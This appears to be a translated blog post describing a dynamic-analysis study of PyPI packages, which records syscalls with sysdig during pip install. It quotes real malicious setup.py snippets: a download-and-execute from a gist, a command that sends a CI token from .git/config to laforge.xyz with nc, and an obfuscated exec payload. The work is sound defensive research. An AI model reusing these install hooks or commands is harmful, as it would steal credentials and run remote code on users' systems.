Check thousands of PyPI packages for malware

8 min


About a year ago Python Software Foundation opened Request for Information (RFI)to discuss how you can detect malicious packages uploaded to PyPI. Obviously this is a real problem affecting almost any package manager: capturing the names of packages abandoned by developers, exploitation of typos in the names of popular libraries or hijacking packages by packaging credentials

The reality is that package managers like PyPI are critical infrastructure that almost every company uses. I could write a lot on this topic, but this release of xkcd will suffice for now.

This area is interesting to me, so I answered with your thoughts about how we can approach the solution of the problem. The entire post is worth reading, but one thought did not leave me alone: ​​what happens immediately after installing the package.

Actions such as establishing network connections or executing commands during a process pip install It is always worth taking with caution, as they give the developer almost no way of examining the code before something bad happens.

I wanted to dig deeper into this matter, so in this post I will share how I installed and analyzed each PyPI package looking for malicious activity.

How to find malicious libraries

Authors usually add code to the file to execute arbitrary commands during installation. setup.py your package. Examples can be seen in this repository

At a high level, to find potentially harmful dependencies, we can do two things: look at the code for bad things (static analysis) or take a risk and just install them to see what happens (dynamic analysis).

Although static analysis is very interesting (thanks to grep I found malicious packages even in npm), in this post I will cover dynamic analysis. In the end, I think it is more reliable, because we are watching what happens in factrather than just looking for unpleasant things that might happen.

So what are we looking for?

How important actions are performed

In general, when something important happens, the process is done by the kernel. Regular programs (e.g. pip) that want to perform important actions through the kernel use syscalls… Opening files, establishing network connections, executing commands – all this is done through system calls!

You can learn more about this from the comic Julia Evans:

This means that if we can observe the syscalls while installing the Python package, we can understand if something suspicious is going on. The advantage of this approach is that it does not depend on the degree of code obfuscation – we see exactly what is actually happening.

It’s important to note that I didn’t come up with the idea of ​​watching syscalls. People like Adam Baldwin talked about it more since 2017… In addition, there is great articlepublished by the Georgia Institute of Technology, which, among other things, takes the same approach. In all honesty, in this post I’ll just try to reproduce their work.

So we know we want to track syscalls, but how exactly do we do that?

Tracking Syscalls with Sysdig

There are many tools available to monitor syscalls. For my project I used sysdigbecause it provides both structured output and convenient filtering functions.

To make it work, when I start the Docker container that installs the package, I also started the sysdig process, which only monitors events from that container. Also I have filtered out network read / write operations going from / to pypi.org or files.pythonhosted.combecause I didn’t want to litter the logs with traffic related to downloading packages.

Having found a way to intercept syscalls, I had to solve another problem: get a list of all PyPI packages.

Getting Python packages

Luckily for us, PyPI has an API called “Simple API”which can also be thought of as “a very large HTML page with a link to each package” because that is what it is. This is a simple neat page written in very high quality HTML.

You can take this page and parse all the links with pup, having received about 268 thousand packets:

❯ curl https://pypi.org/simple/ | pup 'a text{}' > pypi_full.txt               

❯ wc -l pypi_full.txt 
  268038 pypi_full.txt

For this experiment, I will only be interested in the most recent release of each package. There is a chance that there are malicious versions of packages buried in older releases, but the AWS bills will not pay themselves.

As a result, I ended up with something like this processing pipeline:

In short, we send the name of each package to an EC2 instanceset (in the future, I would like to use something like Fargate, but I don’t know Fargate, so …) which gets the package metadata from PyPI, and then runs sysdig. as well as a set of containers for installing the package via pip installwhile collecting information about syscalls and network traffic. Then all the data is transferred to S3 for me to deal with.

This is how the process looks like:

results

After the completion of the process, I got about a terabyte of data located in the S3 bucket and covering about 245 thousand packets. Some packages did not have published versions, some others had various processing errors, but overall this looks like a great sample to work with.

Now for the fun part: a bunch of grep analysis

I combined the metadata and the output to create a set of JSON files that looked something like this:

{
    "metadata": {},
    "output": {
        "dns": [],         // Any DNS requests made
        "files": [],       // All file access operations
        "connections": [], // TCP connections established
        "commands": [],    // Any commands executed
    }
}

Then I wrote a set of scripts to start collecting data, trying to figure out what is harmless and what is harmful. Let’s explore some of the results.

Network requests

There are many reasons why a package might need to create a network connection during the installation process. Perhaps he needs to download binaries or other resources, it may be some kind of analytics, or he may be trying to extract data or accounting information from the system.

As a result, it turned out that 460 packets create network connections to 109 unique hosts. As mentioned in the article mentioned above, quite a few of them are caused by the fact that packages have a common dependency that creates a network connection. You can filter them by matching dependencies, but I haven’t done that yet.

A detailed breakdown of the DNS lookups observed during installation is located here

Command execution

As with network connections, packages can have harmless reasons to execute system commands during installation. This can be done to compile native binaries, set up the desired environment, and so on.

When examining our sample, it turned out that 60,725 packages are executing commands during installation. And as with network connections, keep in mind that many of them are the result of dependency on the package that executes the commands.

Interesting packages

After examining the results, most of the network connections and commands looked harmless as expected. But there are several cases of strange behavior that I wanted to point out in order to demonstrate the usefulness of this kind of analysis.

i-am-malicious

Package named i-am-maliciousseems to be a test of the possibility of a malicious package concept. Here are some interesting details that give us an idea that this package is worth investigating (if its name was not enough for us):

{
  "dns": [{
          "name": "gist.githubusercontent.com",
          "addresses": [
            "199.232.64.133"
          ]
    }]
  ],
  "files": [
    ...
    {
      "filename": "/tmp/malicious.py",
      "flag": "O_RDONLY|O_CLOEXEC"
    },
    ...
    {
      "filename": "/tmp/malicious-was-here",
      "flag": "O_TRUNC|O_CREAT|O_WRONLY|O_CLOEXEC"
    },
    ...
  ],
  "commands": [
    "python /tmp/malicious.py"
  ]
}

We immediately begin to understand what is happening here. We see the connection being made to gist.github.com, executing the Python file and creating a file named /tmp/malicious-was-here… Of course, this happens precisely in setup.py:

from urllib.request import urlopen

handler = urlopen("https://gist.githubusercontent.com/moser/49e6c40421a9c16a114bed73c51d899d/raw/fcdff7e08f5234a726865bb3e02a3cc473cecda7/malicious.py")
with open("/tmp/malicious.py", "wb") as fp:
    fp.write(handler.read())

import subprocess

subprocess.call(["python", "/tmp/malicious.py"])

File malicious.py just adds to /tmp/malicious-was-here a message like “I’ve been here”, hinting that this is indeed a proof-of-concept.

maliciouspackage

Another self-styled malware package, ingeniously named maliciouspackage, slightly more malevolent. Here’s his output:

{
  "dns": [{
      "name": "laforge.xyz",
      "addresses": [
        "34.82.112.63"
      ]
  }],
  "files": [
    {
      "filename": "/app/.git/config",
      "flag": "O_RDONLY"
    },
  ],
  "commands": [
    "sh -c apt install -y socat",
    "sh -c grep ci-token /app/.git/config | nc laforge.xyz 5566",
    "grep ci-token /app/.git/config",
    "nc laforge.xyz 5566"
  ]
}

As in the first case, this gives us a good idea of ​​what is going on. In this example, the package retrieves the token from the file .git/config and downloads it to laforge.xyz… Taking a look at setup.py, we see what exactly is happening:

...
import os
os.system('apt install -y socat')
os.system('grep ci-token /app/.git/config | nc laforge.xyz 5566')

easyIoCtl

Curious package easyIoCtl… It claims to provide “abstractions from boring I / O”, but we see the following commands being executed:

[
  "sh -c touch /tmp/testing123",
  "touch /tmp/testing123"
]

Suspicious but not harmful. However, this ideal example demonstrating the power of syscalls tracking. Here is the relevant code in setup.py project:

class MyInstall():
    def run(self):
        control_flow_guard_controls="l0nE@`eBYNQ)Wg+-,ka}fM(=2v4AVp![dR/\ZDF9sx0c~PO%yc X3UK:.wx0bL$Ijq<&r6*?"1>mSz_^Cto#hiJtG5xb8|;n7T{uH]"r'
        control_flow_guard_mappers = [81, 71, 29, 78, 99, 83, 48, 78, 40, 90, 78, 40, 54, 40, 46, 40, 83, 6, 71, 22, 68, 83, 78, 95, 47, 80, 48, 34, 83, 71, 29, 34, 83, 6, 40, 83, 81, 2, 13, 69, 24, 50, 68, 11]
        control_flow_guard_init = ""
        for controL_flow_code in control_flow_guard_mappers:
            control_flow_guard_init = control_flow_guard_init + control_flow_guard_controls[controL_flow_code]
        exec(control_flow_guard_init)

With this level of obfuscation, it is difficult to understand what is happening. Traditional static analysis could trace the call exec, but that’s all.

To see what’s going on, we can replace exec on print, getting the following:

import os;os.system('touch /tmp/testing123')

It is this command that we tracked, and it demonstrates that even obfuscating the code does not affect the results, because we are tracking at the level of system calls.

What happens when we find a malicious package?

It is worth briefly describing what we can do when we find a malicious package. The first step is to notify PyPI volunteers so they can remove the package. You can do this by writing to security@python.org.

After that, you can see how many times this package has been downloaded using PyPI public dataset on BigQuery.

Here is an example query to find out how many times maliciouspackage was downloaded in the last 30 days:

#standardSQL
SELECT COUNT(*) AS num_downloads
FROM `the-psf.pypi.file_downloads`
WHERE file.project="maliciouspackage"
  -- Only query the last 30 days of history
  AND DATE(timestamp)
    BETWEEN DATE_SUB(CURRENT_DATE(), INTERVAL 30 DAY)
    AND CURRENT_DATE()

Running this query reveals that it has been downloaded over 400 times:

Moving on

So far, we’ve only looked at PyPI in general. Looking at the data, I could not find packages that perform meaningfully malicious actions and do not have the word “malicious” in the name. And this is good! But there is always the possibility that I have missed something, or it may happen in the future. If you are curious to explore the data, then you can find it here

Later, I will write a lambda function to get the latest package changes using RSS feed PyPI. Each updated package will undergo the same processing and send a notification if suspicious activity is detected.

I still don’t like that it is possible to execute arbitrary commands on the user’s system simply by installing the package via pip install… I understand that most use cases are harmless, but this opens up threat opportunities that need to be considered. Hopefully, by strengthening our monitoring of the various package managers, we can detect signs of malicious activity before they have a serious impact.

And this situation is not unique to PyPI alone. Later, I hope to do the same analysis for RubyGems, npm and other managers as the researchers mentioned above. All the code used for the experiment can be found here… As always, if you have any questions, ask them!


Advertising

VDSina proposes virtual servers on Linux and Windows – choose one of the pre-installed OS, or install from your image.


0 Comments

Leave a Reply